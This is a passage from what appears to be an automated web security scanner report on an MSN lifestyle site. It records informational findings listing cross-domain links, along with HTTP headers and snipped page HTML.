<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406210&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fnew-year-new-you%2Fvideo.aspx%3Fvid%3D416830b2-ec67-4155-ba51-efe3faacecec%26from%3Den-us_msnhp%26gt1%3D32094&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.109. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/new-year-new-you/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/new-year-new-you/video.aspx?vid=416830b2-ec67-4155-ba51-efe3faacecec&from=en-us_msnhp&gt1=32094

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344845&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fnew-year-new-you%2Fvideo.aspx%3Fvid%3D416830b2-ec67-4155-ba51-efe3faacecec%26from%3Den-us_msnhp%26gt1%3D32094&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=06e0edd4cfcc41db868ded2e7f6b8068; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2E0ADAEA08344EB3BE3AB3102B928D27; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344845&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fnew-year-new-you%2Fvideo.aspx%3Fvid%3D416830b2-ec67-4155-ba51-efe3faacecec%26from%3Den-us_msnhp%26gt1%3D32094&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.110. http://lifestyle.redacted/your-life/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&gt1=32078

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://download.live.com/?sku=messenger
http://img.widgets.video.s-redacted/js/embed.js
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://money.todayshow.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://parentingearlyyears.bonniersubscriptions.com/HBX0-SITEWIDE-PEY/
http://twitter.com/share
http://www.bankofamerica.com/solutions
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.bundle.com/MyMoney
http://www.coveritlive.com/index2.php/option=com_altcaster/task=viewaltcast/altcast_code=207bf850f8/height=385/width=300
http://www.coveritlive.com/mobile.php/option=com_mobile/task=viewaltcast/altcast_code=5895e5f0d6
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.myhomeredacted/
http://www.parenting.com/
http://www.parenting.com/article/Toddler/Behavior/8-Discipline-Mistakes-Parents-Make?cid=msn
http://www.parenting.com/gallery/25-iphone-apps-for-kids?cid=msn
http://www.parenting.com/gallery/Baby/Top-Girl-Baby-Names?cid=msn
http://www.parenting.com/gallery/Mom/Ridiculous-Parenting-Products?cid=msn
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344845&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D27387034%26gt1%3D32078&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-life/your-money-today/article.aspx?cp-documentid=27387034&gt1=32078 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ea234a142c804af5831ec7272a1550e5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=40EFBA27B80947FF988D1B47905AC12F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344845&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D27387034%26gt1%3D32078&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<area href="http://lifestyle.redacted/your-life/your-money-today/" alt="Your Money Today" shape="rect" coords="0,0,647,79" /><area href="http://money.todayshow.com" alt="Your Money on Today Show" shape="rect" coords="888,53,964,81" /><area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money on MSN Money" shape="rect" coords="811,51,872,81" /><area href="http://www.bankofamerica.com/solutions" alt="Bank of America" shape="rect" coords="822,8,964,53" /></map>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.parenting.com/"><img src="http://blstb.redacted/i/71/CEF1BAE2CE10402EF4C51A46D486.jpg" width="150" height="29" alt="parenting.com" />
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/25-iphone-apps-for-kids?cid=msn">The Best iPhone Apps For Kids and Parents</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Mom/Ridiculous-Parenting-Products?cid=msn">Totally Ridiculous Parenting Products</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Baby/Top-Girl-Baby-Names?cid=msn">Top 10 Baby Names of 2010</a>
...[SNIP]...
<li><a href="http://www.parenting.com/article/Toddler/Behavior/8-Discipline-Mistakes-Parents-Make?cid=msn">8 Discipline Mistakes Parents Make</a>
...[SNIP]...
<li><a href="http://parentingearlyyears.bonniersubscriptions.com/HBX0-SITEWIDE-PEY/">For more great mom-tested tricks, get a free trial issue of Parenting now!</a>
...[SNIP]...
<p><a href="http://www.facebook.com/MSNLife"><img src="http://blstb.redacted/i/8B/1FC16DD76C3B9D615FC9D59FC47E.gif" width="170" height="55" alt="Like MSN Lifestyle on Facebook" class="img0" />
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&OCID=TWT">Tweet</a>
...[SNIP]...
e','1');" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&page=4&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
);" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&page=4&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><iframe src="http://www.coveritlive.com/index2.php/option=com_altcaster/task=viewaltcast/altcast_code=207bf850f8/height=385/width=300" scrolling="no" height="385px" width="300px" frameBorder="0" allowTransparency="true"><a href="http://www.coveritlive.com/mobile.php/option=com_mobile/task=viewaltcast/altcast_code=5895e5f0d6">TODAY Money Live Chat</a>
...[SNIP]...
<li><a href="http://www.bundle.com/MyMoney">Bundle.com: Uncomplicate your money</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.111. http://lifestyle.redacted/your-life/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&gt1=32078

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://download.live.com/?sku=messenger
http://img.widgets.video.s-redacted/js/embed.js
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://money.todayshow.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://parentingearlyyears.bonniersubscriptions.com/HBX0-SITEWIDE-PEY/
http://twitter.com/share
http://www.bankofamerica.com/solutions
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.bundle.com/MyMoney
http://www.coveritlive.com/index2.php/option=com_altcaster/task=viewaltcast/altcast_code=207bf850f8/height=385/width=300
http://www.coveritlive.com/mobile.php/option=com_mobile/task=viewaltcast/altcast_code=5895e5f0d6
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.myhomeredacted/
http://www.parenting.com/
http://www.parenting.com/article/Toddler/Behavior/8-Discipline-Mistakes-Parents-Make?cid=msn
http://www.parenting.com/gallery/25-iphone-apps-for-kids?cid=msn
http://www.parenting.com/gallery/Baby/Top-Girl-Baby-Names?cid=msn
http://www.parenting.com/gallery/Mom/Ridiculous-Parenting-Products?cid=msn
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406205&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D27387034%26gt1%3D32078&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ed8d9aacf7ca42c98902b5a735c56181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0440C6673621460E890862207F751E00; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
